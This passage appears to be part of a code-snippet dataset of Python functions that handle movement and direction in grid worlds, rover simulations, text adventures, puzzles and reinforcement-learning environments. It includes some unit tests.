RIGHT", "def navigate_rover(self, name, instruction_str):\n\n rover = self.rovers.get(name)\n if not rover:\n raise RoverException(ExceptionMessages.BAD_NAME)\n\n coordinate = copy.deepcopy(rover.coordinate)\n direction = rover.direction\n\n for instruction in instruction_str:\n\n if instruction == 'L' or instruction == 'R':\n direction = self._direction_after_turning(direction, instruction)\n elif instruction == 'M':\n coordinate = self._coordinate_after_moving(direction, coordinate)\n else:\n raise RoverException(ExceptionMessages.INVALID_INSTRUCTION)\n\n # This means we have processed all the instructions without exception\n # assign new direction and coordinates to rover\n rover.direction = direction\n rover.coordinate = coordinate", "def get_move(self, direction):\n pos = self._state.index(0)\n row = pos // self._size\n col = pos % self._size\n moves = get_moves(self._size, col, row)\n new_state = self._state\n if direction in moves:\n if moves[direction]['is_movable']:\n new_state = move(self._state, pos, moves[direction]['rel_pos'])\n return Node(new_state, heuristic=self._heuristic,\n g_score=self._g_score+self._cost(self._state, new_state))", "def _calculate_move_location(self, direction):\n current_row = self._current_loc.get_row()\n current_column = self._current_loc.get_column()\n\n # Calculate the new location for a left move\n if (direction == \"l\"):\n return Location(current_row, current_column - 1)\n # Calculate the new 
location for an up move\n elif (direction == \"u\"):\n return Location(current_row - 1, current_column)\n # Calculate the new location for a right move\n elif (direction == \"r\"):\n return Location(current_row, current_column + 1)\n # Calculate the new location for a down move\n elif (direction == \"d\"):\n return Location(current_row + 1, current_column)\n return Location()", "def motorsDirection(self, direction):\n\n print (direction)\n if direction == 'r' or direction == 'R':\n self.motorDirection(self.motor1DirectionPin, self.motorReverse)\n self.motorDirection(self.motor2DirectionPin, self.motorReverse)\n print (\"Direction reverse\")\n else:\n self.motorDirection(self.motor1DirectionPin, self.motorForward)\n self.motorDirection(self.motor2DirectionPin, self.motorForward)\n print (\"Direction forward\")", "def get_action_for_move(\n agent_position: Tuple[int, int],\n agent_direction: Grid4TransitionsEnum,\n next_agent_position: Tuple[int, int],\n next_agent_direction: int,\n rail: GridTransitionMap) -> Optional[RailEnvActions]:\n possible_transitions = rail.get_transitions(*agent_position, agent_direction)\n num_transitions = np.count_nonzero(possible_transitions)\n # Start from the current orientation, and see which transitions are available;\n # organize them as [left, forward, right], relative to the current orientation\n # If only one transition is possible, the forward branch is aligned with it.\n if rail.is_dead_end(agent_position):\n valid_action = RailEnvActions.MOVE_FORWARD\n new_direction = (agent_direction + 2) % 4\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n elif num_transitions == 1:\n valid_action = RailEnvActions.MOVE_FORWARD\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n else:\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n if new_direction == agent_direction:\n valid_action = RailEnvActions.MOVE_FORWARD\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n elif new_direction == (agent_direction + 1) % 4:\n valid_action = RailEnvActions.MOVE_RIGHT\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n elif new_direction == (agent_direction - 1) % 4:\n valid_action = RailEnvActions.MOVE_LEFT\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action", "def move(self, direction):\n # Store the values in the connection dictionary in a list\n self.room_num = self.current_room.connection[direction]\n\n # Check if there is a conditional movement and change the current room\n if len(self.room_num) == 1:\n self.current_room = self.rooms[int(self.room_num[0]) - 1]\n else:\n adventure.check(len(self.room_num))", "def new_location (x, y):\n North, South, West, East = walls(x,y)\n while True:\n direction = input('Direction: ').upper()\n\n if direction == 'N' and 
North:\n y += 1\n break\n elif direction == 'S' and South:\n y -= 1\n break\n elif direction == 'E' and East:\n x += 1\n break\n elif direction == 'W' and West:\n x -=1\n break\n else:\n print('Not a valid direction!')\n return x, y", "def test_input_stream_state_statewp():\n state_t1 = StateTask1(Direction.EAST, 0, 0)\n state_t2 = StateTask2([1, 10], [0, 0])\n\n instructions = tuple(read_instructions(input_stream()))\n assert state_t1.manhatam_distance == 0\n\n assert instructions[0] == Instruction(Direction.FWD, 10)\n state_t1.apply(instructions[0])\n state_t2.apply(instructions[0])\n assert state_t1.north == 0 and state_t1.east == 10\n assert state_t2.waypoint == [1, 10]\n assert state_t2.position == [10, 100]\n\n assert instructions[1] == Instruction(Direction.NORTH, 3)\n state_t1.apply(instructions[1])\n state_t2.apply(instructions[1])\n assert state_t1.north == 3 and state_t1.east == 10\n assert state_t2.waypoint == [4, 10]\n assert state_t2.position == [10, 100]\n\n assert instructions[2] == Instruction(Direction.FWD, 7)\n state_t1.apply(instructions[2])\n state_t2.apply(instructions[2])\n assert state_t1.north == 3 and state_t1.east == 17\n assert state_t2.waypoint == [4, 10]\n assert state_t2.position == [38, 170]\n\n assert instructions[3] == Instruction(Turn.RIGHT, 90)\n state_t1.apply(instructions[3])\n state_t2.apply(instructions[3])\n assert state_t1.north == 3 and state_t1.east == 17\n assert state_t2.waypoint == [-10, 4]\n assert state_t2.position == [38, 170]\n\n assert instructions[4] == Instruction(Direction.FWD, 11)\n state_t1.apply(instructions[4])\n state_t2.apply(instructions[4])\n assert state_t1.north == -8 and state_t1.east == 17\n assert state_t2.waypoint == [-10, 4]\n assert state_t2.position == [-72, 214]", "def applyAction(state, action):\r\n if action == 'N':\r\n return (state[0] - 1, state[1])\r\n\r\n if action == 'E':\r\n return (state[0], state[1] + 1)\r\n\r\n if action == 'W':\r\n return (state[0], state[1] - 1)\r\n\r\n if action == 'S':\r\n return (state[0] + 1, state[1])", "def travel(direction, x, y):\n x_new = x\n y_new = y\n for i in range(len(direction)):\n test = direction[i].lower()\n if test == 'n':\n y_new += 1\n elif test == 's':\n y_new -= 1\n elif test == 'e':\n x_new += 1\n elif test == 'w':\n x_new -= 1\n return (x_new, y_new)", "def move(self, direction):\n command = self.DIRECTIONS[direction][\"command\"]\n mem, out = self.cpu.run_program(inputs=[command])\n status = out.pop()\n if status in (1, 2):\n self.position = Point(\n self.position.x + self.DIRECTIONS[direction][\"mask\"][0],\n self.position.y + self.DIRECTIONS[direction][\"mask\"][1]\n )\n if self.display:\n self.draw_grid()\n sleep(self.delay)\n return status", "def move(self, action):\n \n currentState = self.state\n\n if action == \"up\":\n newState = (self.state[0] - 1, self.state[1])\n elif action == \"down\":\n newState = (self.state[0] + 1, self.state[1])\n elif action == \"right\":\n newState = (self.state[0], self.state[1] + 1)\n elif action == \"left\":\n newState = (self.state[0], self.state[1] - 1)\n else:\n raise NameError(action, 'This is not a valid action!')\n\n # Need to check if the new state is a legal move\n if (newState[0] >= 0) & (newState[0] <= 1) & (newState[1] >= 0) & (newState[1] <= 2):\n return newState\n else:\n print('This move takes you off the board, you have not moved!')\n return currentState", "def move(self, direction):\n try:\n\n if self.in_thing:\n print(\"You have to get out of the \" + str(*self.in_thing[-1]) +\n \" first\")\n return self\n 
if direction == 'north':\n if self.finished_places == 12:\n self.finished_places += 1\n return North(self.items, self.finished_places)\n if direction == 'up':\n if self.finished_places == 4:\n self.finished_places += 1\n return Up(self.items, self.finished_places)\n if direction == 'east':\n if self.finished_places == 2:\n self.finished_places += 1\n return East(self.items, self.finished_places)\n except AttributeError:\n self.items = []\n return self.move(direction)\n print(' you didn\\'t listen to my very subtle hints, i know it was hard'\n ' your lost now. if you remember the commands i told you you can'\n ' go back to where you left off and continue, just type \"QUIT\"')\n return Place(self.items, self.finished_places)\n\n # implement\n # return new instance on class", "def test_findDirection_8(self):\n startCoordinate = coordinate.Coordinate(5, 5)\n endCoordinate = coordinate.Coordinate(3, 7)\n expected_result = 8\n actual_result = rules.findDirection(startCoordinate, endCoordinate)\n self.assertEqual(actual_result, expected_result)", "def move_invalid():\n check50.run(run_command).stdin(\"EAST\").stdout(\"Invalid command.\")", "def get_valid_move_actions_(agent_direction: Grid4TransitionsEnum,\n agent_position: Tuple[int, int],\n rail: GridTransitionMap) -> Set[RailEnvNextAction]:\n valid_actions: Set[RailEnvNextAction] = OrderedSet()\n possible_transitions = rail.get_transitions(*agent_position, agent_direction)\n num_transitions = np.count_nonzero(possible_transitions)\n # Start from the current orientation, and see which transitions are available;\n # organize them as [left, forward, right], relative to the current orientation\n # If only one transition is possible, the forward branch is aligned with it.\n if rail.is_dead_end(agent_position):\n action = RailEnvActions.MOVE_FORWARD\n exit_direction = (agent_direction + 2) % 4\n if possible_transitions[exit_direction]:\n new_position = get_new_position(agent_position, exit_direction)\n valid_actions.add(RailEnvNextAction(action, new_position, exit_direction))\n elif num_transitions == 1:\n action = RailEnvActions.MOVE_FORWARD\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n valid_actions.add(RailEnvNextAction(action, new_position, new_direction))\n else:\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n if new_direction == agent_direction:\n action = RailEnvActions.MOVE_FORWARD\n elif new_direction == (agent_direction + 1) % 4:\n action = RailEnvActions.MOVE_RIGHT\n elif new_direction == (agent_direction - 1) % 4:\n action = RailEnvActions.MOVE_LEFT\n else:\n raise Exception(\"Illegal state\")\n\n new_position = get_new_position(agent_position, new_direction)\n valid_actions.add(RailEnvNextAction(action, new_position, new_direction))\n return valid_actions", "def loss_direction(direction, eps):\n return to_python_scalar(eps * (direction @ g.t()) - 0.5 * eps ** 2 * direction @ H @ direction.t())", "def loss_direction(direction, eps):\n return to_python_scalar(eps * (direction @ g.t()) - 0.5 * eps ** 2 * direction @ H @ direction.t())", "def direction(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"direction\")", "def test_findDirection_bad(self):\n startCoordinate = coordinate.Coordinate(4, 4)\n self.assertRaises(ValueError,\n rules.findDirection,\n startCoordinate,\n startCoordinate)", "def shift(self, direction):\n try:\n if 
direction == Direction.UP:\n return self.shift_up()\n elif direction == Direction.DOWN:\n return self.shift_down()\n elif direction == Direction.RIGHT:\n return self.shift_right()\n elif direction == Direction.LEFT:\n return self.shift_left()\n else:\n raise IndexError(\"Invalid direction {}\".format(direction))\n except IndexError as e:\n raise IndexError(e)", "def steer(self, command):\n if isinstance(command, int):\n assert command < len(self.commands)\n command = self.commands[command] # change command id into real command\n if command == 'move forward':\n self.control_conn.sendall('upO'.encode())\n elif command == 'turn left':\n self.control_conn.sendall('leftO'.encode())\n elif command == 'turn right':\n self.control_conn.sendall('rightO'.encode())\n elif command == 'stop':\n self.control_conn.send('stopO'.encode())\n else:\n print('pre', self.pre_cmd)\n self.steer(self.pre_cmd)\n command = self.pre_cmd\n self.pre_cmd = command\n return self.commands.index(command)", "def apply_one_command(old_state, command):\n direction = command[0]\n times = int(command[1:])\n for i in range(times):\n old_state = go_one_step(old_state, direction)\n yield old_state", "def man_dir():\n\n print \"\\n\" + \"-\" * 8 + \"Select Direction\" + \"-\" * 8\n print \"1. Up\"\n print \"2. Down\"\n print \"3. Left\"\n print \"4. Right\"\n choice = valid(\"\\nSelect direction: \", 1, 4)\n\n if choice == 1:\n direct = \"U\"\n elif choice == 2:\n direct = \"D\"\n elif choice == 3:\n direct = \"L\"\n elif choice == 4:\n direct = \"R\"\n return direct", "def tile_change(direction, tile):\n lower_direction = direction.lower()\n if lower_direction == \"n\":\n tile += 1\n elif lower_direction == \"s\":\n tile -= 1\n elif lower_direction == \"e\":\n tile += 10\n else:\n tile -= 10\n return tile", "def move(self, direction):\n if direction in self.linked_rooms:\n return self.linked_rooms[direction]\n else:\n print(\"You can't go that way\")\n return self", "def get_direction_to_right(self, direction):\r\n return direction_to_right[direction]", "def _get_ship_direction(self):\n direction_string = input(\"Please select the ship direction of your choice (up, down, left, right).\\n\")\n if direction_string == \"down\":\n return b_types.Coordinate(1, 0)\n elif direction_string == \"up\":\n return b_types.Coordinate(-1, 0)\n elif direction_string == \"right\":\n return b_types.Coordinate(0, 1)\n elif direction_string == \"left\":\n return b_types.Coordinate(0, -1)\n else:\n print(\"Invalid direction! 
Please try again (make sure casing and spelling match)\")\n return self._get_ship_direction()\n return None # will never reach return, but removes lint error", "def _next_state(self, state, action):\n\n # Transition table to define movement for each action\n if self.action_type == 'VonNeumann':\n transitions = {0: [-1, 0], 1: [+1, 0], 2: [0, -1], 3: [0, +1]}\n elif self.action_type == 'Moore':\n transitions = {0: [-1, 0], 1: [+1, 0], 2: [0, -1], 3: [0, +1],\n 4: [-1, +1], 5: [+1, +1], 6: [-1, -1], 7: [+1, -1]}\n\n new_state = [state[0] + transitions[action][0], state[1] + transitions[action][1]]\n if self.maze[new_state[0]][new_state[1]] == 1: # Hit wall, stay there\n return state\n else: # Valid move for 0, 2, 3, 4\n return new_state", "def move(self, direction):\n\n if direction == \"north\":\n self.go_and_update(-1, 0)\n\n elif direction == \"south\":\n self.go_and_update(1, 0)\n\n elif direction == \"east\":\n self.go_and_update(0, 1)\n\n elif direction == \"west\":\n self.go_and_update(0, -1)", "def move(self, direction):\r\n self.stored_direction = direction", "def next_state(self, debug=False):\n\n if self.current_state == 'NoObstacle':\n # First check if any obstacle is in sight\n if self.transitions.next_room_reached():\n self.current_state = 'RoomReached'\n elif self.transitions.obstacle_in_sight():\n self.current_state = 'Obstacle'\n\n elif self.current_state == 'Obstacle':\n # First check if obstacle is still in sight\n if self.transitions.no_obstacle_in_sight() and not self.transitions.obstacle_in_sight():\n self.current_state = 'NoObstacle'\n elif self.transitions.next_room_reached():\n self.current_state = 'RoomReached'\n\n elif self.current_state == 'RoomReached':\n self.current_state = 'InspectCorners'\n\n elif self.current_state == 'InspectCorners':\n if self.transitions.all_corners_inspected():\n if not self.transitions.all_rooms_visited():\n self.current_state = 'RotateToExit'\n else:\n self.current_state = 'Finished'\n\n elif self.current_state == 'RotateToExit':\n if self.transitions.aiming_to_carrot():\n self.current_state = 'NoObstacle'\n\n\n elif self.current_state == 'Finished':\n pass\n\n # DEBUG\n if debug:\n print 'Next state: %s' % self.current_state\n\n if self.current_state is not self.old_state:\n print self.current_state\n\n self.old_state = self.current_state\n\n return self.current_state", "def test_validate_self_invalid_transition_result_direction(self):\n with nose.assert_raises(tmexceptions.InvalidDirectionError):\n self.dtm1.transitions['q0']['y'] = ('q3', 'y', 'U')\n self.dtm1.validate_self()", "def direction(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"direction\")", "def move_length_41(self, move, new_state: \"StonehengeState\"):\n # Then consider the internal1 move\n new1_state = new_state\n if move in [\"D\", \"K\", \"M\"]:\n for i in [[\"D\", 2, 4, 4, 1, 6, 10, 14, 1, 0, 7, 12, 17, 14],\n [\"K\", 5, 15, 12, 1, 3, 6, 14, 1, 9, 11, 12, 13, 8],\n [\"M\", 8, 16, 5, 9, 10, 11, 13, 8, 0, 3, 7, 17, 14]]:\n new1_state = self.loop2(move, new_state, i)\n # Finally consider the internal2 move\n internal2 = [[\"G\", 2, 11, 16, 13, 5, 7, 8, 6, 1, 3, 10, 14, 1],\n [\"H\", 4, 11, 15, 3, 5, 6, 8, 6, 0, 3, 12, 17, 14],\n [\"L\", 2, 6, 16, 13, 4, 7, 15, 3, 9, 10, 12, 13, 8]]\n if move in [\"G\", \"H\", \"L\"]:\n for i in internal2:\n new1_state = self.loop3(move, new_state, i)\n return StonehengeState(not self.p1_turn, new1_state.length,\n new1_state.letters, new1_state.claim)", "def _calc_relative_move_direction(self, char, direction):\n if 
char in (\"Left\", \"Right\"):\n di = -1 if self.video.hflip else 1\n else:\n di = -1 if self.video.vflip else 1\n return direction * di", "def __isDirection__(self, word):\n self.directions = ('north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back')\n for direction in self.directions:\n if direction == word:\n return ('direction', word), True\n return None, False", "def decide_turn_direction(self, next_direction):\n\n # if facing backwards, try to initially go forwards.\n if GPIO.input(pins[\"DirectionMotorRight\"]):\n GPIO.output(pins[\"DirectionMotorRight\"], GPIO.LOW)\n GPIO.output(pins[\"DirectionMotorLeft\"], GPIO.HIGH)\n self.facing = not self.facing\n\n if self.facing == \"Right\":\n if next_direction == \"Down\":\n return \"Right\"\n elif next_direction == \"Up\":\n return \"Left\"\n else: # Left\n return \"Left\"\n\n elif self.facing == \"Left\":\n if next_direction == \"Down\":\n return \"Left\"\n elif next_direction == \"Up\":\n return \"Right\"\n else: # Right\n return \"Right\"\n\n elif self.facing == \"Up\":\n if next_direction == \"Right\":\n return \"Right\"\n elif next_direction == \"Left\":\n return \"Left\"\n else: # Down\n return \"Left\"\n\n else: # down\n if next_direction == \"Right\":\n return \"Left\"\n elif next_direction == \"Left\":\n return \"Right\"\n else: # Up\n return \"Right\"", "def move(self, movement):\n index = self.state.index(0)\n\n new_state = self.state.copy()\n\n if movement == 'up':\n new_state[index], new_state[index - 3] = new_state[index - 3], new_state[index]\n elif movement == 'down':\n new_state[index], new_state[index + 3] = new_state[index + 3], new_state[index]\n elif movement == 'left':\n new_state[index], new_state[index - 1] = new_state[index - 1], new_state[index]\n else:\n # movement == 'right'\n new_state[index], new_state[index + 1] = new_state[index + 1], new_state[index]\n \n return new_state", "def transition(s, direction):\n new_pos = [sum(x) for x in zip(s, direction)] # sum up every element at same index of two lists\n if hit_wall(new_pos):\n return s\n else:\n return new_pos", "def invalid_direction(direction):\n valid_directions = [\"forwards\", \"backwards\"]\n\n if direction not in valid_directions:\n return f\"`direction` must be one of [{', '.join(valid_directions)}]\"\n\n return False", "def get_env_feedback(S, A):\n if A == 'right':\n if S == N_STATES - 2: # reach the target\n S_ = 'terminated'\n R = 1\n else:\n S_ = S + 1\n R = 0\n else: # move left\n R = 0\n if S == 0:\n S_ = S\n else:\n S_ = S - 1\n return S_, R", "def make_step(self, current_state, action):\n\n if current_state == 12:\n current_state = current_state + 50\n elif current_state == 23:\n current_state = current_state + 25\n\n new_state = current_state\n\n if 0 <= current_state < 25:\n dimension = 1\n elif 25 <= current_state < 50:\n dimension = 2\n elif 50 <= current_state < 75:\n dimension = 3\n else:\n print(\"Error in dimension\")\n\n # Update new_position based on the chosen action and check whether agent hits a wall.\n if action == \"n\":\n temp_state = current_state + self.num_cols\n if temp_state < self.num_cells * dimension:\n new_state = temp_state\n elif action == \"e\":\n temp_state = current_state + 1\n if temp_state % self.num_cols > 0:\n new_state = temp_state\n elif action == \"s\":\n temp_state = current_state - self.num_cols\n if temp_state >= 0 + (25 * (dimension - 1)):\n new_state = temp_state\n elif action == \"w\":\n temp_state = current_state - 1\n if temp_state % self.num_cols < self.num_cols - 1:\n new_state = 
temp_state\n else:\n raise ValueError('Action was mis-specified!')\n\n # Get reward\n reward = self.rewards[new_state]\n\n # Deduct 1 from reward for every attempted move\n reward -= 1\n\n return (new_state, reward)", "def turn(self, dir):\n if dir.upper() == 'R':\n if self.direction == 3:\n self.direction = 0\n else:\n self.direction += 1\n if dir.upper() == 'L':\n if self.direction == 0:\n self.direction = 3\n else:\n self.direction -= 1", "def parse_next_instruction(self) -> None:\n instruction = self.program[self.pointer]\n opcode = instruction % 100\n if opcode == 99:\n self.halt = True\n\n self.modes = instruction // 100\n\n if opcode == 1:\n self.op_sum()\n if opcode == 2:\n self.op_multiply()\n if opcode == 3:\n self.op_input()\n if opcode == 4:\n self.op_output()\n if opcode == 5:\n self.op_jump_if_true()\n if opcode == 6:\n self.op_jump_if_false()\n if opcode == 7:\n self.op_less_than()\n if opcode == 8:\n self.op_equal_to()\n if opcode == 9:\n self.op_adjust_relative()", "def get_new_position_for_action(\n agent_position: Tuple[int, int],\n agent_direction: Grid4TransitionsEnum,\n action: RailEnvActions,\n rail: GridTransitionMap) -> Tuple[int, int, int]:\n possible_transitions = rail.get_transitions(*agent_position, agent_direction)\n num_transitions = np.count_nonzero(possible_transitions)\n # Start from the current orientation, and see which transitions are available;\n # organize them as [left, forward, right], relative to the current orientation\n # If only one transition is possible, the forward branch is aligned with it.\n if rail.is_dead_end(agent_position):\n valid_action = RailEnvActions.MOVE_FORWARD\n exit_direction = (agent_direction + 2) % 4\n if possible_transitions[exit_direction]:\n new_position = get_new_position(agent_position, exit_direction)\n if valid_action == action:\n return new_position, exit_direction\n elif num_transitions == 1:\n valid_action = RailEnvActions.MOVE_FORWARD\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n if valid_action == action:\n return new_position, new_direction\n else:\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n if new_direction == agent_direction:\n valid_action = RailEnvActions.MOVE_FORWARD\n if valid_action == action:\n new_position = get_new_position(agent_position, new_direction)\n return new_position, new_direction\n elif new_direction == (agent_direction + 1) % 4:\n valid_action = RailEnvActions.MOVE_RIGHT\n if valid_action == action:\n new_position = get_new_position(agent_position, new_direction)\n return new_position, new_direction\n elif new_direction == (agent_direction - 1) % 4:\n valid_action = RailEnvActions.MOVE_LEFT\n if valid_action == action:\n new_position = get_new_position(agent_position, new_direction)\n return new_position, new_direction", "def step(action, state):\n observation = state\n reward = 0\n done = False\n if action == \"right\":\n if state == N_STATES - 2:\n observation = \"terminal\"\n reward = 1\n done = True\n else:\n observation = state + 1\n else:\n # move left\n if state != 0:\n observation = state - 1\n return observation, reward, done", "def move(self, direction):\n try:\n direction = self._DIRECTIONS[direction]\n except KeyError:\n raise CommandCannotBeExecuted\n new_room = self._room.get_neighbor(direction)\n if new_room:\n self._room = new_room\n 
self._rooms_already_visited.add(str(self._room))\n self._room.update_player(self)\n if self.have_won():\n raise ThePlayerWonTheGame\n return \"You are now in: {} \".format(str(self._room))\n else:\n raise CommandCannotBeExecuted", "def input(self, symbol, *args, **kwargs):\n if self.__state is None:\n raise ValueError(\"FSM state is undefined\")\n try:\n transition = self.__get_state_attr(self._transition_prefix)\n except AttributeError:\n raise Exception(\"unable to find transition function or target\")\n if callable(transition):\n new_state = transition(symbol)\n elif isinstance(transition, dict):\n new_state = transition[symbol]\n else:\n new_state = transition\n return None if new_state is None else self.enter(new_state, *args, **kwargs)", "def _convert_direction(direction: str) -> Tuple[float, int]:\n\n direction_to_heading = {\"L\": math.pi / 2, \"R\": -math.pi / 2}\n\n return direction_to_heading[direction[0]], int(direction[1])", "def tryDirection(d, currentRoom):\n attrib = d + '_to'\n\n # See if the room has the destination attribute\n if hasattr(currentRoom, attrib):\n # If so, return its value (the next room)\n return getattr(currentRoom, attrib)\n\n # Otherwise print an error and stay in the same room\n print(\"Where do you think your going?\")\n\n return currentRoom", "def opposite(self):\n if self.direction == 8: return Direction(8)\n n = self.direction + 4\n if n >= 8: n -= 8\n return Direction(n)", "def _coordinate_after_moving(self, direction, coordinate):\n\n if direction == 'N':\n new_coordinate = Coordinate(coordinate.x, coordinate.y + 1)\n elif direction == 'S':\n new_coordinate = Coordinate(coordinate.x, coordinate.y - 1)\n elif direction == 'W':\n new_coordinate = Coordinate(coordinate.x - 1, coordinate.y)\n else:\n new_coordinate = Coordinate(coordinate.x + 1, coordinate.y)\n\n if not self._is_coordinate_in_the_grid(new_coordinate):\n raise RoverException(ExceptionMessages.OFF_GRID)\n\n if self._is_coordinate_occupied(new_coordinate):\n raise RoverException(ExceptionMessages.ROVER_COLLISION)\n\n return new_coordinate", "def nextPositionOffset(self):\n if self.dir == \"N\":\n return (0, -1)\n elif self.dir == \"S\":\n return (0, 1)\n elif self.dir == \"E\":\n return (1, 0)\n elif self.dir == \"W\":\n return (-1, 0)\n else:\n raise TypeError(\"invalid direction '%s'\" % self.dir)", "def make_move(self, direction):\r\n\t\tif direction == 0:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x-1][self.y] = self.board[self.x-1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x -= 1\r\n\r\n\t\telif direction == 1:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y+1] = self.board[self.x][self.y+1], self.board[self.x][self.y]\r\n\t\t\tself.y += 1\r\n\r\n\t\telif direction == 2:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x+1][self.y] = self.board[self.x+1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x += 1\r\n\r\n\t\telif direction == 3:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y-1] = self.board[self.x][self.y-1], self.board[self.x][self.y]\r\n\t\t\tself.y -= 1", "def test_findDirection_1(self):\n startCoordinate = coordinate.Coordinate(5, 5)\n endCoordinate = coordinate.Coordinate(5, 7)\n expected_result = 1\n actual_result = rules.findDirection(startCoordinate, endCoordinate)\n self.assertEqual(actual_result, expected_result)", "def make_move(self, move: Any) -> \"StonehengeState\":\n new_state = StonehengeState(self.p1_turn, self.length,\n self.letters[:], self.claim[:])\n state = new_state\n if new_state.length == 
1:\n state = self.move_length_1(move, new_state)\n if new_state.length == 2:\n state = self.move_length_2(move, new_state)\n if new_state.length == 3:\n state = self.move_length_3(move, new_state)\n if new_state.length == 4:\n if move in [\"A\", \"B\", \"J\", \"O\", \"N\", \"R\",\n \"C\", \"F\", \"E\", \"I\", \"P\", \"Q\"]:\n state = self.move_length_4(move, new_state)\n else:\n state = self.move_length_41(move, new_state)\n if new_state.length == 5:\n if move in [\"A\", \"B\", \"U\", \"O\", \"T\", \"Y\",\n \"C\", \"J\", \"E\", \"N\", \"V\", \"X\"]:\n state = self.move_length_5(move, new_state)\n elif move in [\"F\", \"I\", \"W\"]:\n state = self.move_length_51(move, new_state)\n else:\n state = self.move_length_52(move, new_state)\n return state", "def movee(self):\n\n #return the initial state if he cant move and he's in the initial state\n if not self.move and self.index == 0:\n return self.path[self.index]\n\n #return the goal state if he's at the goal state\n if self.index == len(self.path):\n return self.path[-1]\n\n #return the next move and increments the index attribute\n nextMove = self.path[self.index]\n self.index += 1\n\n return nextMove", "def get_dir_from_path(self):\n try:\n next_step = self.return_path[0]\n if next_step[0] > self.tile[0]:\n return 'd' # move up next\n if next_step[0] < self.tile[0]:\n return 'u' # move down next\n if next_step[1] > self.tile[1]:\n return 'r' # move right next\n if next_step[1] < self.tile[1]:\n return 'l' # move left next\n except IndexError as ie:\n print('Error while trying to get new path direction', ie)\n return None", "def move(self, direction, no_of_exits):\n if direction in NS:\n self.y = shift[direction](self.y)\n else:\n self.x = shift[direction](self.x)\n\n # Store new movement\n self.path.append([self.x, self.y])\n\n # Stores new tested junction direction after reset\n if self.moved() is False:\n self._dead_end_direction[-1].append(direction)\n\n # Stores the direction and location when testing a new junction.\n if no_of_exits > 1 and self.moved() is True:\n self._dead_end_direction.append([direction])\n self._junction_index.append(len(self.fullpath()) - 1)\n\n self._moved = True", "def step(self, action):\n x, y = self.state_to_coord(self.current_state)\n if action == self.actions['up']:\n possible_next_state = self.coord_to_state(x - 1, y)\n if x - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n elif possible_next_state in self.goal_states:\n result = possible_next_state, self.goal_reward, True\n else:\n result = possible_next_state, self.step_reward, False\n elif action == self.actions['right']:\n possible_next_state = self.coord_to_state(x, y + 1)\n if y + 1 >= self.columns or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['left']:\n possible_next_state = self.coord_to_state(x, y - 1)\n if y - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['down']:\n possible_next_state = self.coord_to_state(x + 1, y)\n if x + 1 >= self.rows or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n else:\n raise ValueError('Expected action value in {}, received {} in state {}'.\n 
format(self.actions, action, self.state_to_coord(self.current_state)))\n\n self.current_state = result[0]\n return result", "def check_condition(direction, steps):\n assert direction in ['L', 'R', 'U', 'D'], \"Direction information has an incorrect alphabet\"\n assert steps > 0, \"Step value is zero\"", "def _set_transition(\n self, current_state, current_symbol, next_symbol, direction, next_state\n ):\n self._set_symbol(current_symbol)\n self._set_symbol(next_symbol)\n self._set_state(current_state)\n self._set_state(next_state)\n\n if self._transitions.get(current_state) is None:\n self._transitions[current_state] = {}\n\n self._transitions[current_state][current_symbol] = (\n next_symbol,\n direction,\n next_state,\n )", "def get_move(self, legal):\n move = Directions.STOP\n if (self.WEST_KEY in self.keys) and Directions.WEST in legal:\n move = Directions.WEST\n if (self.EAST_KEY in self.keys) and Directions.EAST in legal:\n move = Directions.EAST\n if (self.NORTH_KEY in self.keys) and Directions.NORTH in legal:\n move = Directions.NORTH\n if (self.SOUTH_KEY in self.keys) and Directions.SOUTH in legal:\n move = Directions.SOUTH\n return move", "def _move(self, direction) -> bool:\n if direction == K_UP:\n return self._move_up()\n elif direction == K_DOWN:\n return self._move_down()\n elif direction == K_LEFT:\n return self._move_left()\n elif direction == K_RIGHT:\n return self._move_right()\n else:\n raise ValueError(f\"This method is not equipped to handle the given key: {direction}\")", "def move(self, m):\n if m not in \"RLUD\":\n raise ValueError(\n (\"Not a legal move: '{}', should be one of \" +\n \"the 'RLUD'.\").format(m))\n if m not in self.legal_moves:\n raise ValueError(\n (\"Not a legal move at this state: '{}', \" +\n \"should be one of the '{}'.\").format(m, self.legal_moves))\n\n posdiff = (0, 0)\n if m == 'L':\n posdiff = (0, 1)\n elif m == 'R':\n posdiff = (0, -1)\n elif m == 'U':\n posdiff = (1, 0)\n elif m == 'D':\n posdiff = (-1, 0)\n\n empty_position = self.get_position(0)\n newpuz = self.swap((empty_position[0] - posdiff[0],\n empty_position[1] - 